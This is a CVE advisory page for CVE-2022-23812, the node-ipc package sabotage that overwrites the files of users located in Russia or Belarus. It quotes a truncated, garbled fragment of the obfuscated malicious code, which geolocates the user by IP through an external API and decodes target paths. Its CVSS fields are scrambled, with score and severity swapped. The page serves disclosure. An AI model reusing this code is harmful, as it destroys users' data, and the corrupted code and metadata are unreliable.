CVE-2022-23812 Information

Jun 07, 2022 cve

Description

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code that targets users with IP located in Russia or Belarus and overwrites their files with a heart emoji. Note: from versions 11.0.0 onwards instead of having malicious code directly in the source of this package node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: Note: Don’t run it! js import u from \path; import a from s; import o from \https; setTimeout(function () const t = Math.round(Math.random() 4); if (t > 1) return; const n = Buffer.from(HR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=\ ase64); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(�tf8) function (t) t.on(\data\ function (t) const n = Buffer.from(\Li8=\ ase64); const o = Buffer.from(\Li4v\ ase64); const r = Buffer.from(\Li4vLi4v\ ase64); const f = Buffer.from(\Lw==\ ase64); const c = Buffer.from(\Y291bnRyeV9uYW1l\ ase64); const e = Buffer.from(## CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Reference

https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580 https://github.com/RIAEvangelist/node-ipc/issues/233 https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370 https://github.com/RIAEvangelist/node-ipc/issues/236 https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js https://security.netapp.com/advisory/ntap-20220407-0005/

Attack Complexity

LOW

Privileges Required

NONE

User Interaction Required

NONE

Scope

NONE

Confidentiality Impact

UNCHANGED

Integrity Impact

HIGH

Availability Impact

HIGH

Base Score

HIGH

Base Severity

9.8

Share on: